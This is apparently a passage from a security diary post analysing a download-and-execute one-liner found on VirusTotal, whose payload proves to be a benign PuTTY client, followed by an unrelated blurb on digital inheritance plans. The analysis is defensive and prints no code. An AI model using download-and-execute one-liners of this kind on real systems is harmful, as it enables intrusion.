This one-liner downloads and executes a payload. What about the payload? It’s a PuTTY client (SHA256: 601cdbddfe6ac894daff506167c164c65446f893d1d5e4b95e92d960ff5f52b0), nothing malicious. There is a good chance that this piece of code has been submitted to VT by a Red Team or by attackers who are still brushing up their payload. The IP address is an AWS instance and the homepage returns:

me empresta 10k ai???

This Portuguese sentence means “lend me 10k there ???”

[1] https://www.virustotal.com/gui/file/e5f242deb5f37eb0754fa214ccb0b00593b348e63f1775a0c9e4529a8f78e1f8/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

Digital Inheritance

What happens to our digital presence when we die or become incapacitated? Many of us have or know we should have a will and checklists of what loved ones need to know in the event of our passing. But what about all of our digital data and online accounts? Consider creating some type of digital will, often called a “Digital Inheritance” plan.